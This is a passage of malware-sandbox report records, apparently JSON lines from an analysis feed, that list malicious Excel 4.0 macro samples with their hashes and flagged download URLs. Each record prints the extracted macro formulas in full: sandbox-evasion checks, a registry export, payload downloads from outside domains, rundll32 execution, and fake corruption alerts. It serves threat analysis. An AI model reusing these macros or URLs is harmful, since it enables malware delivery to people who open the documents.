255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ne3MmU5pwg\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"754c9f914b38acf189db0225f4a3a87a17f5b853f23036a0a36c9b99f69432a3"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"754c9f914b38acf189db0225f4a3a87a17f5b853f23036a0a36c9b99f69432a3","filesize":168960,"md5":"001d96cfd7bfa03d2f1b30e9a9c16185","sha1":"e559a9f88347cb69841ac577d16e865f5c172417","sha256":"754c9f914b38acf189db0225f4a3a87a17f5b853f23036a0a36c9b99f69432a3","sha512":"55391da8b45060317a5a734a47d76cd8b0477ff02f36553e84e498c417a6ffa52e6fd53e9e0abf293a9204d8f93bb57c0658d6178cf20ad5a174c6bf8060b594","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"754c9f914b38acf189db0225f4a3a87a17f5b853f23036a0a36c9b99f69432a3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sY80kALE7n\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"754e236b6d8af6956a92962f868232798224fef62ba35a612db51714910fd753"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"754e236b6d8af6956a92962f868232798224fef62ba35a612db51714910fd753","filesize":185344,"md5":"15121895995da620a86eef26cb49dbec","sha1":"dfd2e4f333456d0d98b0f2fa205e8228ccd04488","sha256":"754e236b6d8af6956a92962f868232798224fef62ba35a612db51714910fd753","sha512":"2463c5670f47d9c6c397886a5790fa5ac796cf6078fb6b6568f790dc99e87648a022f5843c26ad08a7990227c7b5fc794091c2f14776351cf8c9a70b24edb143","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"754e236b6d8af6956a92962f868232798224fef62ba35a612db51714910fd753.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"755388bd4e4518b312e29f71bded6e3812fcbe4be62925f2b0314544d1132b55"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"755388bd4e4518b312e29f71bded6e3812fcbe4be62925f2b0314544d1132b55","filesize":209920,"md5":"851a7904a5e022e42ed9d6250178d50e","sha1":"4f226b8e88ec0eeb0d04011287c58d79e1bd4ef0","sha256":"755388bd4e4518b312e29f71bded6e3812fcbe4be62925f2b0314544d1132b55","sha512":"cf452b3511f157f4744ad0c96280e7efa7970789bc224086673f91c2f98812d2d9426344c1099db0e0864cdd34cc53ea614d87eda731ee57d9fc9fae9df7f839","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"755388bd4e4518b312e29f71bded6e3812fcbe4be62925f2b0314544d1132b55.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Iv76zOCq0Q\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"756a24bd4fdafd5bbc187315465da75b5095d6557b8c517c79792bfd936beb6c"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"756a24bd4fdafd5bbc187315465da75b5095d6557b8c517c79792bfd936beb6c","filesize":113664,"md5":"8be3556cc58e59a2d6ab3db7da7c3f4d","sha1":"955e73732c12c1700d031bed67799c3014b56d02","sha256":"756a24bd4fdafd5bbc187315465da75b5095d6557b8c517c79792bfd936beb6c","sha512":"4fb140bb393613e394e4e247252d0a2812141d53b3118463437ef99d1054764287f1e927f1daed54fcdfc7ae510738a93d940df67bb5d8f8247e6667fc1987c9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"756a24bd4fdafd5bbc187315465da75b5095d6557b8c517c79792bfd936beb6c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"tNzhWLyWPp\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"758dab10666752ab9b91c2883ed83b00481ca88b657bb0b53880df18a738ddfb"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"758dab10666752ab9b91c2883ed83b00481ca88b657bb0b53880df18a738ddfb","filesize":104448,"md5":"b1e208e6078a52460f2cc2b4193d0226","sha1":"9a8c848b76963eb8b563e2ba0ce66d48a57c1d04","sha256":"758dab10666752ab9b91c2883ed83b00481ca88b657bb0b53880df18a738ddfb","sha512":"147f2fe3ba99dd2998437cc01eae4555907f367289f4e8245c0ec465a564d97812dab581f00e8bc4bfa446120d293739004db0545c2be0d0acebf086ec4ed0fe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"758dab10666752ab9b91c2883ed83b00481ca88b657bb0b53880df18a738ddfb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"UDSOctg5DI\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"759449360dc1233f7da84ac95be3d7812049fbf54e0a6472c1ec18917a8b2f59"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"759449360dc1233f7da84ac95be3d7812049fbf54e0a6472c1ec18917a8b2f59","filesize":185344,"md5":"07ebc09c7f06ee4f0b22287a95e83971","sha1":"693ada5efc868ae1818794f1863473963a3c05e7","sha256":"759449360dc1233f7da84ac95be3d7812049fbf54e0a6472c1ec18917a8b2f59","sha512":"8413982293c3df4887bc1a4ea4a225ff61d05e844dff459326d88f7ed2ab10626cebb9095ec61458b2b872e5275ba154720cca773e315c7e3f27fe72db2dafef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"759449360dc1233f7da84ac95be3d7812049fbf54e0a6472c1ec18917a8b2f59.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"75a55411d003a0f68752837e1f6eabbf00b5ce516172ec954f465b98f1f499c1"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"75a55411d003a0f68752837e1f6eabbf00b5ce516172ec954f465b98f1f499c1","filesize":206336,"md5":"28274a7e7f8c5593786f4afc07cb226f","sha1":"03262635e6c6be9dabd2c3905c0ad3a754abb2e9","sha256":"75a55411d003a0f68752837e1f6eabbf00b5ce516172ec954f465b98f1f499c1","sha512":"08f63657e834d80f484d53fe4e8efe523210c1ed43329da45b9f28c675f1b384abb046f05ba4e7e221be93a6a5a4f900392ba96b59f062c0107c3f06178a327d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"75a55411d003a0f68752837e1f6eabbf00b5ce516172ec954f465b98f1f499c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mQ96eEruM7\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"75c3b24f4190553ee86a068d11e252c2f1f0c4a49ffaabc71b4582ef3b6abd56"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"75c3b24f4190553ee86a068d11e252c2f1f0c4a49ffaabc71b4582ef3b6abd56","filesize":152576,"md5":"fa624b00796a279942ef2bc75e96b2d2","sha1":"3ce2e65a07c3f9f89213321db7ac180ed76c4957","sha256":"75c3b24f4190553ee86a068d11e252c2f1f0c4a49ffaabc71b4582ef3b6abd56","sha512":"1ce70c4c277438385f5bc41a2afa461328f851be9c31c2135abf424b06e51b6b4ed59ff8aadb1655bd2e5c34c98e8a9fc14c8c32b1dd09bca2bba808a41e514f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"75c3b24f4190553ee86a068d11e252c2f1f0c4a49ffaabc71b4582ef3b6abd56.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WhsT2K8Mn4\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"75df68100dc0ae84b13aa4c6cc1b1e23b7e5475c56fe8b4c49c9f34acdedf00c"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"75df68100dc0ae84b13aa4c6cc1b1e23b7e5475c56fe8b4c49c9f34acdedf00c","filesize":141312,"md5":"7836b35672f3e2116651916cc7185f7f","sha1":"ffb9940cd03b7d4c0b01b9781410b3f224f8df70","sha256":"75df68100dc0ae84b13aa4c6cc1b1e23b7e5475c56fe8b4c49c9f34acdedf00c","sha512":"b4453e7fa0ff8ccd8dab001c2aca59436ae5d6cb27e6596e5c0453b65097067009065cbf1b20f14552f74d4107c1b480d5f0e4789c59c057928e0a9540ef84cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"75df68100dc0ae84b13aa4c6cc1b1e23b7e5475c56fe8b4c49c9f34acdedf00c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"J6tKdwXOCF\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"75eed6786d2d6c6e006331c79e2dd7b79edd24d467e79edb5727738aea78d16e"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"75eed6786d2d6c6e006331c79e2dd7b79edd24d467e79edb5727738aea78d16e","filesize":209920,"md5":"803ed562e2070a4159af4d7df80542b8","sha1":"d34f1324a8973901f1a7b7314bf726332c62f942","sha256":"75eed6786d2d6c6e006331c79e2dd7b79edd24d467e79edb5727738aea78d16e","sha512":"9b045bd407c7251c7addd0e9a5593c79cbdb58b8f756ab5b119ee6e14deda44ee741d35893a0592110fff77369026717438046ce728e19824301e16497dadf83","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"75eed6786d2d6c6e006331c79e2dd7b79edd24d467e79edb5727738aea78d16e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GRD8Lhe7iB\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"75fc88d678c3b1558f8501aa82f366dff313bbf51ff1cd752ba90be91dafd7e6"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"75fc88d678c3b1558f8501aa82f366dff313bbf51ff1cd752ba90be91dafd7e6","filesize":168960,"md5":"c86414a1072f684771c988acbcfa2a60","sha1":"136626ede71c753c982a5ccfe5586f077a170d1d","sha256":"75fc88d678c3b1558f8501aa82f366dff313bbf51ff1cd752ba90be91dafd7e6","sha512":"3a63052f0f7d02ceddadca5c6058143e12f64a87d84b8c19bcfcc2ae9af16eefe2b889f62747dc6c8683222fd51e67e18408f3dd6f1dbab2e2f0153fdc5e17cd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"75fc88d678c3b1558f8501aa82f366dff313bbf51ff1cd752ba90be91dafd7e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0TziyfF4xP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"76011a713aaf0f2ff006a755f4022770e4c67d8a66a08754b5e8429dc09c7b19"},"analysis":{"reported":"2020-04-09T16:17:07Z","score":10},"files":[{"filename":"76011a713aaf0f2ff006a755f4022770e4c67d8a66a08754b5e8429dc09c7b19","filesize":168448,"md5":"3a9783d5413bb2dff5e8b2b54585f4dd","sha1":"8c45c58e2a3457c0098796b8822b59e0b50e9200","sha256":"76011a713aaf0f2ff006a755f4022770e4c67d8a66a08754b5e8429dc09c7b19","sha512":"32f9c18569376b368e3a552951df44782c9fa9a2016cf9d014082164ab3111c1ad11bfa48f4af382eb1a18d64a4b778ace80960c8e9ccfb89cadfd3a8813d55d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"76011a713aaf0f2ff006a755f4022770e4c67d8a66a08754b5e8429dc09c7b19.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OCCp46iFXn\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"76110da9fb0b12375e565bc8e6a2c723817e2e079b7d35aaeb30a2ac50a310ac"},"analysis":{"reported":"2020-04-09T16:17:07Z","score":10},"files":[{"filename":"76110da9fb0b12375e565bc8e6a2c723817e2e079b7d35aaeb30a2ac50a310ac","filesize":185344,"md5":"85bb0575b4d8f143b09bbc4b4182e644","sha1":"cdee031b6def67b043d718bde54c554f16d527e7","sha256":"76110da9fb0b12375e565bc8e6a2c723817e2e079b7d35aaeb30a2ac50a310ac","sha512":"813fa5eae9a06942f5473f764dc0bc6eccc3e3936dfb1f811d120ded58eb7ae3bd188e040a42b77a5e3cf681b47408bdce18ffba2285888752c1fc46b2f83651","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"76110da9fb0b12375e565bc8e6a2c723817e2e079b7d35aaeb30a2ac50a310ac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"76117a7a5577c919a8321980244df8c6ac0ad2094e4b0d60d37aeba372084005"},"analysis":{"reported":"2020-04-09T16:17:07Z","score":10},"files":[{"filename":"76117a7a5577c919a8321980244df8c6ac0ad2094e4b0d60d37aeba372084005","filesize":167936,"md5":"bd88aecd4984c510182b7541eb5c588b","sha1":"408828b435181ced3daaf232c125a05cf175e07b","sha256":"76117a7a5577c919a8321980244df8c6ac0ad2094e4b0d60d37aeba372084005","sha512":"79baa86ba4b0468f5b9fc55efeb5c7bc9c03871bd74c325b70f1b5d7ed7acad06f7651fa476e916c9d183fe4d18f0bff8a3138ffe2027d36b9d210b33fc98cbd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"76117a7a5577c919a8321980244df8c6ac0ad2094e4b0d60d37aeba372084005.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"v24rB9NT8Q\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7617bf61816066fdb5813f87a057622f7a28660cc465a706eba58fa3a8d392ea"},"analysis":{"reported":"2020-04-09T16:17:07Z","score":10},"files":[{"filename":"7617bf61816066fdb5813f87a057622f7a28660cc465a706eba58fa3a8d392ea","filesize":146944,"md5":"2b891e11b5e8d6420442b7bfcb4830e9","sha1":"72cf91ac63ade8c624a35cbfbfa2dc7ad0d0db3d","sha256":"7617bf61816066fdb5813f87a057622f7a28660cc465a706eba58fa3a8d392ea","sha512":"17f7096c764047ab9afb67e602a7c592a38444e5d2bf78b990949a33c51a8b2c8f21e0baddc595549eadb5827fe0a8b5fd8136c91d55720ea25e8a11e80e3252","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7617bf61816066fdb5813f87a057622f7a28660cc465a706eba58fa3a8d392ea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM 